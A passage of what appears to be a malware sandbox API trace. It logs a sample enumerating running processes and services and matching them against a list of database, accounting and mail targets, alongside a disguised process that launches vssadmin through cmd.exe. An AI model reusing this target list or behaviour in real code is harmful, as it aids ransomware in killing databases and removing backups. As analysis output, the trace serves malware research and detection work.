(dwFlags=0x2, th32ProcessID=0x0) returned 0x1b0 [0035.398] Process32FirstW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0035.398] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0035.399] lstrlenW (lpString="System") returned 6 [0035.399] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0035.399] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0035.399] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0035.399] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0035.399] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0035.399] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0035.399] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0035.399] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0035.400] lstrlenW (lpString="smss.exe") returned 8 [0035.400] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0035.400] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0035.400] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0035.400] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0035.400] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0035.400] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0035.400] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0035.400] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0035.401] lstrlenW (lpString="csrss.exe") returned 9 [0035.401] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0035.401] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0035.401] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0035.401] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0035.401] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0035.401] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0035.401] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0035.401] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0035.402] lstrlenW (lpString="wininit.exe") returned 11 [0035.402] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0035.402] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0035.402] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0035.402] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0035.402] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0035.402] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0035.402] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0035.402] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0035.403] lstrlenW (lpString="csrss.exe") returned 9 [0035.403] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0035.403] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0035.404] lstrlenW (lpString="winlogon.exe") returned 12 [0035.404] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0035.405] lstrlenW (lpString="services.exe") returned 12 [0035.405] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0035.405] lstrlenW (lpString="lsass.exe") returned 9 [0035.405] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0035.406] lstrlenW (lpString="lsm.exe") returned 7 [0035.406] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0035.407] lstrlenW (lpString="svchost.exe") returned 11 [0035.407] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0035.407] lstrlenW (lpString="svchost.exe") returned 11 [0035.408] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0035.408] lstrlenW (lpString="svchost.exe") returned 11 [0035.408] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0035.409] lstrlenW (lpString="svchost.exe") returned 11 [0035.409] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0035.410] lstrlenW (lpString="svchost.exe") returned 11 [0035.410] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0035.410] lstrlenW (lpString="audiodg.exe") returned 11 [0035.410] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0035.411] lstrlenW (lpString="svchost.exe") returned 11 [0035.411] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0035.412] lstrlenW (lpString="svchost.exe") returned 11 [0035.412] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0035.413] lstrlenW (lpString="dwm.exe") returned 7 [0035.413] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0035.413] lstrlenW (lpString="explorer.exe") returned 12 [0035.413] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0035.415] lstrlenW (lpString="spoolsv.exe") returned 11 [0035.415] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0035.415] lstrlenW (lpString="taskhost.exe") returned 12 [0035.415] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0035.416] lstrlenW (lpString="svchost.exe") returned 11 [0035.416] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0035.417] lstrlenW (lpString="taskeng.exe") returned 11 [0035.417] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0035.417] lstrlenW (lpString="taskhost.exe") returned 12 [0035.417] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ingredients posters keywords.exe")) returned 1 [0035.418] lstrlenW (lpString="ingredients posters keywords.exe") returned 32 [0035.418] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="moderate-instruments-repairs.exe")) returned 1 [0035.419] lstrlenW (lpString="moderate-instruments-repairs.exe") returned 32 [0035.419] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sa_shape.exe")) returned 1 [0035.420] lstrlenW (lpString="sa_shape.exe") returned 12 [0035.420] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="confidence.exe")) returned 1 [0035.420] lstrlenW (lpString="confidence.exe") returned 14 [0035.420] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="jaguar_assist_dictionaries.exe")) returned 1 [0035.421] lstrlenW (lpString="jaguar_assist_dictionaries.exe") returned 30 [0035.421] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="blue.exe")) returned 1 [0035.422] lstrlenW (lpString="blue.exe") returned 8 [0035.422] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="newly debut.exe")) returned 1 [0035.422] lstrlenW (lpString="newly debut.exe") returned 15 [0035.423] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="symbols_garage_parents.exe")) returned 1 [0035.423] lstrlenW (lpString="symbols_garage_parents.exe") returned 26 [0035.423] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="archive.exe")) returned 1 [0035.424] lstrlenW (lpString="archive.exe") returned 11 [0035.424] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="defend.exe")) returned 1 [0035.425] lstrlenW (lpString="defend.exe") returned 10 [0035.425] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arservice.exe")) returned 1 [0035.425] lstrlenW (lpString="arservice.exe") returned 13 [0035.425] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr-programmer.exe")) returned 1 [0035.426] lstrlenW (lpString="rr-programmer.exe") returned 17 [0035.426] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="capability-ethernet-museums.exe")) returned 1 [0035.427] lstrlenW (lpString="capability-ethernet-museums.exe") returned 31 [0035.427] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="twistedmonton.exe")) returned 1 [0035.428] lstrlenW (lpString="twistedmonton.exe") returned 17 [0035.428] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arc plains.exe")) returned 1 [0035.428] lstrlenW (lpString="arc plains.exe") returned 14 [0035.428] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="americahousestip.exe")) returned 1 [0035.429] lstrlenW (lpString="americahousestip.exe") returned 20 [0035.429] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cats-exceed-photo.exe")) returned 1 [0035.656] lstrlenW (lpString="cats-exceed-photo.exe") returned 21 [0035.660] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="medical lectures.exe")) returned 1 [0035.671] lstrlenW (lpString="medical lectures.exe") returned 20 [0035.671] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="electronic.exe")) returned 1 [0035.672] lstrlenW (lpString="electronic.exe") returned 14 [0035.672] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="regression.exe")) returned 1 [0035.673] lstrlenW (lpString="regression.exe") returned 14 [0035.673] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="county.exe")) returned 1 [0035.673] lstrlenW (lpString="county.exe") returned 10 [0035.673] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0035.674] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0035.674] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0035.675] lstrlenW (lpString="dllhost.exe") returned 11 [0035.675] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0035.675] lstrlenW (lpString="dllhost.exe") returned 11 [0035.676] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0035.676] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0035.676] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x954, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0035.677] lstrlenW (lpString="cmd.exe") returned 7 [0035.677] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0035.678] lstrlenW (lpString="conhost.exe") returned 11 [0035.678] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x968, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0035.678] lstrlenW (lpString="vssadmin.exe") returned 12 [0035.678] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0035.680] lstrlenW (lpString="VSSVC.exe") returned 9 [0035.680] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 0 [0035.680] CloseHandle (hObject=0x1b0) returned 1 [0035.680] Sleep (dwMilliseconds=0x1f4) [0036.204] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x4232b80 [0036.205] EnumServicesStatusExW (in: hSCManager=0x4232b80, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 0 [0036.205] GetLastError () returned 0xea [0036.205] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x123e) returned 0xbcaca8 [0036.205] EnumServicesStatusExW (in: hSCManager=0x4232b80, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xbcaca8, cbBufSize=0x123e, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xbcaca8, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 1 [0036.206] CloseServiceHandle (hSCObject=0x4232b80) returned 1 [0036.207] lstrlenW (lpString="Appinfo") returned 7 [0036.207] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0036.207] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0036.207] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0036.207] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0036.207] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0036.207] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0036.207] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0036.207] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0036.207] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0036.207] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0036.207] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0036.207] lstrlenW (lpString="AudioSrv") returned 8 [0036.207] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0036.207] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0036.207] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0036.207] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0036.207] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0036.207] lstrlenW (lpString="BFE") returned 3 [0036.207] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0036.207] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0036.207] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0036.207] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0036.207] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0036.207] lstrlenW (lpString="CryptSvc") returned 8 [0036.207] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0036.207] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0036.207] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0036.207] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0036.207] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0036.207] lstrlenW (lpString="CscService") returned 10 [0036.208] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0036.208] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0036.208] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0036.208] 